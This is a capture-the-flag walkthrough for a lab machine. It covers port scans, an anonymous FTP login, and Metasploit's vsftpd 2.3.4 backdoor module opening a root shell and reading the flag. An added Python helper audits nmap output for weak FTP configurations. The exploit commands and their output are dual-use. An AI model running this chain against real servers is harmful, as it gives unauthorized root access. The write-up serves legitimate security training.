FLAG1

5ee499eb5d0b8e4269b13483e57adaa0b3815f48

Enumeration

rustscan -a 10.150.150.12
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
22/tcp open  ssh     syn-ack
nmap -sC -sV 10.150.150.12
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.66.66.66
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
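The scan output above carries two different vsftpd versions: the -sV guess on the port line (2.0.8 or later) and the version the server reports in its own STAT reply (2.3.4), which is the one the Metasploit module name further down (vsftpd_234_backdoor) refers to. The following is an added example, not part of the original write-up: a small audit helper that parses nmap -sC -sV text output and flags anonymous FTP, a plain-text control channel, and a banner/STAT version mismatch. The function names, finding labels and the trimmed sample are assumptions made for the illustration.

```python
import re

# Constructed sample: trimmed copy of the nmap output shown above.
SAMPLE_SCAN = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
| FTP server status:
|      Control connection is plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
"""

PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
VSFTPD_VERSION = re.compile(r"vsftpd\s+(\d+(?:\.\d+)+)", re.I)

def split_ports(scan_text):
    """Group each open port line with the NSE script lines ('|') under it."""
    ports, current = {}, None
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {"service": m.group(2), "version": m.group(3).strip(), "scripts": []}
        elif current is not None and line.startswith("|"):
            ports[current]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports

def audit_ftp(scan_text):
    """Return (port, finding) tuples for FTP services in nmap -sC -sV output."""
    findings = []
    for port, info in split_ports(scan_text).items():
        if info["service"] != "ftp":
            continue
        scripts = "\n".join(info["scripts"])
        if "Anonymous FTP login allowed" in scripts:
            findings.append((port, "anonymous-login"))
        if "Control connection is plain text" in scripts:
            findings.append((port, "plaintext-control"))
        guess = VSFTPD_VERSION.search(info["version"])  # nmap -sV guess
        stat = VSFTPD_VERSION.search(scripts)           # server's own STAT reply
        if stat and guess and stat.group(1) != guess.group(1):
            findings.append((port, f"version-mismatch:{guess.group(1)}!={stat.group(1)}"))
        if stat and stat.group(1) == "2.3.4":
            findings.append((port, "vsftpd-2.3.4"))
    return findings
```

Run over saved scan results, a version-mismatch finding means the STAT value, not the port-line guess, is the one to check against advisories and patch records.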

Exploitation

ftp 10.150.150.12

Anonymous login allowed

Connected to 10.150.150.12.
220 Through the portal... - into nothingness or bliss?

Name (10.150.150.12:zyaire): Anonymous
331 Please specify the password.
Password:
230 Login successful.

Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.

But the listing is empty; it seems like nothing is there.

A simple Google search for vsftpd 2.0.8 leads to this website: https://www.hackingdna.com/2020/09/exploit-vsftpd-208.html

msfconsole

msf6 > search vsftpd

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.150.150.12

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.150.150.12:21 - Banner: 220 Through the portal... - into nothingness or bliss?
[*] 10.150.150.12:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

When the terminal with the successful FTP login has been closed, the target cannot be exploited.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.150.150.12:21 - The port used by the backdoor bind listener is already open
[+] 10.150.150.12:21 - UID: uid=0(root) gid=0(root) groups=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.66.66.66:40627 -> 10.150.150.12:6200 ) at 2022-01-23 16:18:55 +0800

whoami
root

When you run it again while another terminal holds a successful FTP login, you can gain access.

Now get the root flag:

cat FLAG1.txt
5ee499eb5d0b8e4269b13483e57adaa0b3815f48